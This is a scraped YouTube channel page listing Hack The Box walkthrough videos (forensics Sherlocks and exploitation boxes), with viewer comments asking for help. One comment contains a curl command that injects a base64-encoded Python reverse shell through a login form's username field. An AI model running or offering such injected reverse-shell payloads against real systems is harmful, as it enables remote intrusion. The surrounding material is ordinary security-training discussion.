D1v1n3Th3Cl0wn
D1v1n3Th3Cl0wn
  • 35
  • 18 815
Reaper | Investigating Suspicious Logon Events | Hack The Box | Sherlocks
🚨 Our SIEM just threw a curveball-a suspicious logon event with mismatched IP addresses and workstation names! 🕵️‍♀️ Join me as we dive into network captures and event logs to unravel this cybersecurity mystery and report back to our SOC Manager.
🔎 Will we piece together the clues and find the culprit behind this anomaly? Watch as we correlate evidence, analyze data, and showcase essential skills for any aspiring cybersecurity professional!
🔥 Don't forget to like, share, and subscribe for more thrilling adventures in the world of hacking and cybersecurity!
Переглядів: 200

Відео

Campfire-2 | Forela Network Attack Investigation | Hack The Box | Sherlocks
Переглядів 1542 місяці тому
🚨 Forela's Network is under attack again! Our security system detected an old admin account requesting a ticket from the KDC on the domain controller. This account shouldn't be in use, raising suspicions of an AsREP roasting attack! Join me as I investigate this alert and uncover the truth behind it. 🔍 In this video, I delve into: Analyzing the suspicious KDC request Investigating potential AsR...
Campfire-1 | Kerberoasting Investigation | Hack The Box | Sherlocks
Переглядів 4013 місяці тому
Doc to read: techcommunity.microsoft.com/t5/core-infrastructure-and-security/decrypting-the-selection-of-supported-kerberos-encryption-types/ba-p/1628797 🔍 Join me as we investigate a potential Kerberoasting attack in this exciting Sherlock activity on Hack The Box! Alonzo spotted some weird files on his computer, and it's up to our newly assembled SOC Team to get to the bottom of it. We'll ana...
Noted | Analyzing Extortion Attack | Hack The Box | Sherlocks
Переглядів 1493 місяці тому
🔍 Join me as I dive into a real-world DFIR (Digital Forensics and Incident Response) investigation! Simon, a developer at Forela, found a chilling note on his desktop claiming his system was hacked and sensitive data was stolen. The attackers are threatening to release it on the dark web! 🚨 With only Notepad artifacts in hand, our mission is to uncover how the attack happened and find a way to ...
Reason for not coming live 🤯🤯⚡️⚡️
Переглядів 594 місяці тому
Reason for not coming live 🤯🤯⚡️⚡️
Logjammer | Windows Event Log Analysis for Junior DFIR Consultant Role | Hack The Box | Sherlocks
Переглядів 2265 місяців тому
In this UA-cam video, follow along as I walk through the steps to complete the Hack the Box CTF Challenge by exploiting two vulnerabilities. This solution is perfect for anyone who wants to test their skills in the world of ethical hacking while sharpening their problem-solving abilities. #SAUEasy #HTBEasy #CTFEasy #CyberSecurityEasy #PenTestingEasy #NetworkSecurityEasy #LinuxEasy #WindowsEasy ...
Devvortex Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 3
Переглядів 1415 місяців тому
🔐 Welcome to another Hack The Box walkthrough! Join us as we explore the "Zipping" machine, a medium-difficulty Linux box featuring a range of attack vectors. In this tutorial, we'll cover the entire process, from identifying a file upload vulnerability to achieving root access through privilege escalation. 🛠️ Topics Covered: 1. File Upload Exploitation: Discover a web application vulnerability...
Litter | Uncovering a Silent Threat: Investigating a Compromised Host | Hack The Box | Sherlocks
Переглядів 1336 місяців тому
In this UA-cam video, follow along as I walk through the steps to complete the Hack the Box CTF Challenge by exploiting two vulnerabilities. This solution is perfect for anyone who wants to test their skills in the world of ethical hacking while sharpening their problem-solving abilities. #SAUEasy #HTBEasy #CTFEasy #CyberSecurityEasy #PenTestingEasy #NetworkSecurityEasy #LinuxEasy #WindowsEasy ...
Brutus | Unmasking Unix Auth Logs: The Brutus Challenge | Hack The Box | Sherlocks
Переглядів 1,5 тис.6 місяців тому
Welcome to Sherlock Files! In this thrilling episode, we dive into the enigmatic world of Unix auth.log and wtmp logs with the Brutus Challenge on Hack The Box. Witness a Confluence server's struggle against a relentless SSH brute-force attack and unravel the hidden truths buried within auth.log. Beyond brute-force, we unveil the secrets of privilege escalation, persistence, and command executi...
Unit42 | Uncovering Malicious Activity with Sysmon Logs | Hack The Box | Sherlocks
Переглядів 5366 місяців тому
Unit42 | Uncovering Malicious Activity with Sysmon Logs | Hack The Box | Sherlocks
BFT | Unraveling and Mastering MFT Mysteries | Hack The Box | Sherlocks
Переглядів 9106 місяців тому
BFT | Unraveling and Mastering MFT Mysteries | Hack The Box | Sherlocks
Codify Hack The Box | CVE-2023-37466(vm2) | MYSQL | Script-Logic-Compromise | Open Beta Season 3
Переглядів 956 місяців тому
Codify Hack The Box | CVE-2023-37466(vm2) | MYSQL | Script-Logic-Compromise | Open Beta Season 3
Manager Hack The Box | Active Directory Certificate Services | MSSQL | Open Beta Season 3
Переглядів 2897 місяців тому
Manager Hack The Box | Active Directory Certificate Services | MSSQL | Open Beta Season 3
Hyperfiletable | Forela's New Joiner Faces a Phishing Attempt | Hack The Box | Sherlocks
Переглядів 1118 місяців тому
Hyperfiletable | Forela's New Joiner Faces a Phishing Attempt | Hack The Box | Sherlocks
Meerkat | Securing a Fast-Growing Startup: Analyzing PCAP and Log Data | Hack The Box | Sherlocks
Переглядів 6508 місяців тому
Meerkat | Securing a Fast-Growing Startup: Analyzing PCAP and Log Data | Hack The Box | Sherlocks
Zipping Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 2
Переглядів 799 місяців тому
Zipping Hack The Box | Zip-File Symlink | SQLI | LFI | Privilege Escalation | Open Beta Season 2
Bumblebee | Forela Breach: External Contractor Steals Admin Credentials | Hack The Box | Sherlocks
Переглядів 6189 місяців тому
Bumblebee | Forela Breach: External Contractor Steals Admin Credentials | Hack The Box | Sherlocks
OpTinselTrace-5 | Festive Cyber Chaos: Tinkertech Servers Hacked! 🎄🔒 | Hack The Box | Sherlocks
Переглядів 2399 місяців тому
OpTinselTrace-5 | Festive Cyber Chaos: Tinkertech Servers Hacked! 🎄🔒 | Hack The Box | Sherlocks
OpTinselTrace-4 | Santa's Workshop Printers Under Attack! 🎅Packet Capture | Hack The Box | Sherlocks
Переглядів 749 місяців тому
OpTinselTrace-4 | Santa's Workshop Printers Under Attack! 🎅Packet Capture | Hack The Box | Sherlocks
OpTinselTrace-3 | Santa's Trouble: VPN File Leak, Network Breach! | Hack The Box | Sherlocks
Переглядів 809 місяців тому
OpTinselTrace-3 | Santa's Trouble: VPN File Leak, Network Breach! | Hack The Box | Sherlocks
Optinseltrace-2 | Unwrapping Santa's Tech Secrets | Hack The Box | Sherlocks
Переглядів 1959 місяців тому
Optinseltrace-2 | Unwrapping Santa's Tech Secrets | Hack The Box | Sherlocks
OpTinselTrace-1 | Elfin's Suspicious Activity: Uncovering Santa's Insider | Hack The Box | Sherlocks
Переглядів 3679 місяців тому
OpTinselTrace-1 | Elfin's Suspicious Activity: Uncovering Santa's Insider | Hack The Box | Sherlocks
PC Hack The Box | gRPC | SQL Injection | Pyload | CSRF | CVE-2023-0297
Переглядів 255Рік тому
PC Hack The Box | gRPC | SQL Injection | Pyload | CSRF | CVE-2023-0297
Cozyhosting Hack The Box | Command Injection | Session | PostgreSQL | SSH | Open Beta Season 2
Переглядів 1,9 тис.Рік тому
Cozyhosting Hack The Box | Command Injection | Session | PostgreSQL | SSH | Open Beta Season 2
SandWorm Hack The Box | SSTI | Horizontal Privilege Escalation | Rust | FireJail| Open Beta Season 2
Переглядів 1,1 тис.Рік тому
SandWorm Hack The Box | SSTI | Horizontal Privilege Escalation | Rust | FireJail| Open Beta Season 2
Keeper Hack The Box | Common Credentials | KeePass | Data Dump | Puttygen | Open Beta Season 2
Переглядів 2,7 тис.Рік тому
Keeper Hack The Box | Common Credentials | KeePass | Data Dump | Puttygen | Open Beta Season 2
Pilgrimage Hack The Box | Upload LFI | BinWalk | Open Beta Season 2
Переглядів 582Рік тому
Pilgrimage Hack The Box | Upload LFI | BinWalk | Open Beta Season 2
SAU Hack The Box | SSRF | OS Command Injection | Script | Open Beta Season 2
Переглядів 4,3 тис.Рік тому
SAU Hack The Box | SSRF | OS Command Injection | Script | Open Beta Season 2

КОМЕНТАРІ

  • @joe-hd3uv
    @joe-hd3uv 17 днів тому

    You don’t have nearly enough views, these Sherlock walkthroughs are great, thanks!

    • @DivineTheClown
      @DivineTheClown 17 днів тому

      Thanks bro 🥹 that's why I'm not uploading any videos it take efforts so I decided once I reach 500 subscription and people start meeting my like goals then I'll again start putting time in it.

  • @sonembesilbukucu172
    @sonembesilbukucu172 Місяць тому

    Name of noting the app?

  • @tommykelly8920
    @tommykelly8920 Місяць тому

    Thanks for the write-up. It was very clear and helpful!

  • @lucypite
    @lucypite 2 місяці тому

    Can you tell me where the over 50 flows username install&password install come from

    • @DivineTheClown
      @DivineTheClown 2 місяці тому

      If you don’t mind please can you share or point out the video timestamp?

    • @lucypite
      @lucypite 2 місяці тому

      @@DivineTheClown of course sir about 17.09 after filter out login requests there are many login attempt seems invalid all of these requests username and password equal to install

    • @DivineTheClown
      @DivineTheClown 2 місяці тому

      @lucypite those are the failed attempts which must have been cause by the wordlist or by the application itself on the login service or might be trying different variation with defaults.

    • @lucypite
      @lucypite 2 місяці тому

      @@DivineTheClown got it love you so much

    • @DivineTheClown
      @DivineTheClown 2 місяці тому

      @lucypite 🫢☺️🤗

  • @lucypite
    @lucypite 2 місяці тому

    keep going man

  • @maheshbaskaran-pz9rc
    @maheshbaskaran-pz9rc 2 місяці тому

    Could you please tell us the note taking app name? Thanks

  • @imca_b_5517
    @imca_b_5517 3 місяці тому

    Share your LinkedIn profile i want to connect you

  • @abhishekupadhyay657
    @abhishekupadhyay657 3 місяці тому

    Thanks and keep the good work

  • @ayaan-dx9vo
    @ayaan-dx9vo 4 місяці тому

    mujhe seekhna hai

    • @DivineTheClown
      @DivineTheClown 4 місяці тому

      ♥️ Join upcoming lives hope will shed basic knowledge with advance.

  • @pwkgod
    @pwkgod 4 місяці тому

    thanks for your video, i was a bit lost on how to use the tools

    • @DivineTheClown
      @DivineTheClown 4 місяці тому

      The same happens with me now and then but my notes help me some times.

  • @vietanhle8311
    @vietanhle8311 4 місяці тому

    What app are you using to take note and cheat sheet on video??

  • @dsiisus
    @dsiisus 4 місяці тому

    What application do you use to save your notes and screenshots and looks like the icon is Amethyst?

  • @kalidsherefuddin
    @kalidsherefuddin 4 місяці тому

    Thanks for

  • @kadi-yf9ol
    @kadi-yf9ol 5 місяців тому

    Could you please share with us the resource to the list of all links tools?

    • @DivineTheClown
      @DivineTheClown 5 місяців тому

      There are many researches who have built their own list and you will find that all those are similar so you can just Google for DFIR tools you will get a list of like many legs where you can get all kinds of tools.

  • @the7Cofficial
    @the7Cofficial 6 місяців тому

    Broo im intrested your videos i need jingle bell

    • @DivineTheClown
      @DivineTheClown 6 місяців тому

      Will upload when it retires can’t violate TOS of HTB even tho they don’t care about there own policy 😂😂😂

    • @the7Cofficial
      @the7Cofficial 6 місяців тому

      @@DivineTheClown 🥲💊

  • @michaelanderton5948
    @michaelanderton5948 6 місяців тому

    What file are you uploading to Hybrid Analysis at 41:17? I uploaded present.vbs but I do not have the options in the Falcon Sanbox Reports section.

    • @DivineTheClown
      @DivineTheClown 6 місяців тому

      The file i got around 35:05 time stamp i guess don't remember have to check back on notes

  • @michaelanderton5948
    @michaelanderton5948 6 місяців тому

    Great video!! What obsidian theme are you using? How do you do that task block?

    • @DivineTheClown
      @DivineTheClown 6 місяців тому

      Thank you, and I'm not sure about the theme which one I'm using. But for the task block i believe you are referring to "callouts". If I'm not wrong.

  • @the7Cofficial
    @the7Cofficial 6 місяців тому

    ❤need more sherlock video broo i need juggling and APTnightmare

  • @josephkimiri7982
    @josephkimiri7982 7 місяців тому

    Well done. Can I get your obsidian notes?

    • @DivineTheClown
      @DivineTheClown 7 місяців тому

      Will share someday it's still under development. 😋

  • @Malwr0316
    @Malwr0316 7 місяців тому

    Please do "Hunter" challenge from Sherlocks

    • @DivineTheClown
      @DivineTheClown 7 місяців тому

      I will be doing it and I have more then 3 or 4 videos pre recorded it's just i don't get time to edit or don't have an editor who can edit. But I'll try my best to provide it.

  • @mateimartin9234
    @mateimartin9234 11 місяців тому

    Can i have your notes, please, the ones with nmap and so on

    • @DivineTheClown
      @DivineTheClown 11 місяців тому

      I know everyone wants my notes but it's still under development once it's half finished I'll make them public.

  • @dino43432
    @dino43432 11 місяців тому

    Please more HTB videos so far following along in 3 videos all 3 worked for me

  • @LZMusic2
    @LZMusic2 11 місяців тому

    nice work :) and if u can give the link of that dashboard of tools like when u get the command of postgres and thanks

    • @DivineTheClown
      @DivineTheClown 11 місяців тому

      That's still under construction 🚧 working on it's not complete once i complete it I'll make it public.👍🏾

  • @ExE.Nativo
    @ExE.Nativo 11 місяців тому

    nice dude!

  • @comicmania76
    @comicmania76 11 місяців тому

    Thanks! It helped me a lot😁

  • @johnny_sins-gamer
    @johnny_sins-gamer Рік тому

    Hi bro Can Please share your obsidian database file please.....

    • @DivineTheClown
      @DivineTheClown Рік тому

      Not sharing with anybody yet as it's still under progress I mean it's not fully complete yet.

    • @DivineTheClown
      @DivineTheClown Рік тому

      But yes I'll share it once i complete it half.

  • @TheMachineWolf
    @TheMachineWolf Рік тому

    Thank you so much... I must be an idiot, I could not figure out how to get the .kdbx off the freaking system, spent a good 2 hours trying never even thought to set a python server.

  • @dino43432
    @dino43432 Рік тому

    Would like more HTB videos

    • @DivineTheClown
      @DivineTheClown Рік тому

      Definitely sir😁 but from now on only retired boxes.

  • @floaberger
    @floaberger Рік тому

    love your breakdowns. just started university for IT-security. and helps a lot

  • @q_maxgames6045
    @q_maxgames6045 Рік тому

    Hey, what's the name of the notebook you use at the beginning of the video

    • @DivineTheClown
      @DivineTheClown Рік тому

      It's an Obsidian notes taking app where I keep/make my notes. 😊

  • @johnny_sins-gamer
    @johnny_sins-gamer Рік тому

    Hi bro can share your command list which you have it look very clean and more of helpful

  • @ZezoHagag-z6t
    @ZezoHagag-z6t Рік тому

    Thank you I have a question What is the name of the panel through which you open all the URLs? from open urls

    • @DivineTheClown
      @DivineTheClown Рік тому

      It's a browser extension "Open Multiple URLs" you can search for it in the extension Store

    • @ZezoHagag-z6t
      @ZezoHagag-z6t Рік тому

      thanks @@DivineTheClown

  • @Jonathan-ng4vw
    @Jonathan-ng4vw Рік тому

    can you share your obsidian database files by google link or any

    • @DivineTheClown
      @DivineTheClown Рік тому

      Sorry not possible for now it is under progress

    • @Jonathan-ng4vw
      @Jonathan-ng4vw Рік тому

      By the way, thanks for the walkthrough. I was just stuck and kept getting the "Username can't contain whitespace" error but after watching your walkthrough this issue resolved@@DivineTheClown

  • @aberbescu
    @aberbescu Рік тому

    Not working for me, did all steps and when listening with netcat does not connect, monitored with pspy74 looks like the scripts does work but not connecting

    • @DivineTheClown
      @DivineTheClown Рік тому

      What command did you use ? Please share that

    • @amboXD
      @amboXD Рік тому

      same here bro got user flag on my own but couldnt get root because nc shell never binded

    • @amboXD
      @amboXD Рік тому

      python3 exp.py ./image.png (my ip) 9001 and nc -lvnp 9001 then downloaded binwalk_exploit.png into shrunk through wget but nothing happens

    • @DivineTheClown
      @DivineTheClown Рік тому

      You have to run 2 ssh connections to complete that 1st with ssh tunnel and 2nd ssh plain connection when we run binwalk exploit which will give us nc connection.

    • @amboXD
      @amboXD Рік тому

      i did logged in as emily through ssh and downloaded the binwalk_exploit.png inside of the folder that is checked by the root malware scan process@@DivineTheClown

  • @bilalbahadur8956
    @bilalbahadur8956 Рік тому

    not working ssh -i authorized_keys atlas@ip enter password showing

    • @DivineTheClown
      @DivineTheClown Рік тому

      If the key doesn't have any password just press "Enter" when it asks for password

    • @bilalbahadur8956
      @bilalbahadur8956 Рік тому

      @@DivineTheClown if i put password on a key and then enter the password when atlas logging then it work?

    • @DivineTheClown
      @DivineTheClown Рік тому

      It should work. But like I said don't add a password on the key.

  • @serhdom3649
    @serhdom3649 Рік тому

    Thanks for your tutorial, can you share your dashboards?

    • @DivineTheClown
      @DivineTheClown Рік тому

      Dashboard?

    • @serhdom3649
      @serhdom3649 Рік тому

      @@DivineTheClown 20:39

    • @serhdom3649
      @serhdom3649 Рік тому

      I mean this@@DivineTheClown

    • @DivineTheClown
      @DivineTheClown Рік тому

      Ok bro that's the whole database in obsidian 😅 and still under development. It will take 1 more year I guess to complete half.

    • @serhdom3649
      @serhdom3649 Рік тому

      Too bad😁😅@@DivineTheClown

  • @Tarunsinghnoble
    @Tarunsinghnoble Рік тому

    for me, on the basket page I created the "login" button is kind of disabled. When I hover over the login, the mouse icon doesn't change, unlike other links. When I run the script it says URL: Rejected: Bad hostname.... Please help

    • @DivineTheClown
      @DivineTheClown Рік тому

      Did you configure the basket For local proxy?

    • @Tarunsinghnoble
      @Tarunsinghnoble Рік тому

      @@DivineTheClown yes i selected all the options while creating it

    • @DivineTheClown
      @DivineTheClown Рік тому

      So just tell me on which part of the video you are stuck.

  • @mohamedakramserrssif484
    @mohamedakramserrssif484 Рік тому

    where is the user flag ?

  • @k4id095
    @k4id095 Рік тому

    Hi, van you help me please? curl '10.10.11.xxx:55555/htb/login' -d 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjI0MSIsOTAwMSkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oInNoIikn|base64 -d|bash`' Login failed -> ¿?

    • @DivineTheClown
      @DivineTheClown Рік тому

      Did it work ? Sorry i was busy didn't check the comment 😅

  • @anonymous-l4c
    @anonymous-l4c Рік тому

    hey i have problem on port 55555 its not opening in browser . what to do ?

    • @DivineTheClown
      @DivineTheClown Рік тому

      Is your VPN connected and Box is active ?

    • @anonymous-l4c
      @anonymous-l4c Рік тому

      @@DivineTheClown yes also when i connect with router then its working but when i connect my computer with my mobile hotspot to access internet its not working 😶‍🌫️ i don't know why this happens. Note i uses kali linux gnome as main os not in virtual box

    • @DivineTheClown
      @DivineTheClown Рік тому

      I also use Kali as a base but I never tried solving the box using my Smartphone internet as I have a good internet connection 😋. I hope your lan internet connection is also good

  • @DivineTheClown
    @DivineTheClown Рік тому

    Guys do tell me which box or topic you want next video from me. I'm waiting.

    • @_cyb3rry
      @_cyb3rry Рік тому

      Hi... please can you do one for "zipping"?

    • @DivineTheClown
      @DivineTheClown Рік тому

      I already did but can't make it public it'll be out once it's retired. Because I recently got to know that if HBT found me that I am releasing the active box they might block my HTB account. Although I'll be releasing them if I get enough subscribers soon and my channel gets a membership option I will release the active machine also but only for members until then I can't do anything I don't want to ban my account on HTB. Sorry 🙇😔

    • @topeagle2002
      @topeagle2002 Рік тому

      Sniper seasonal box

    • @DivineTheClown
      @DivineTheClown Рік тому

      Sorry sir but i can't.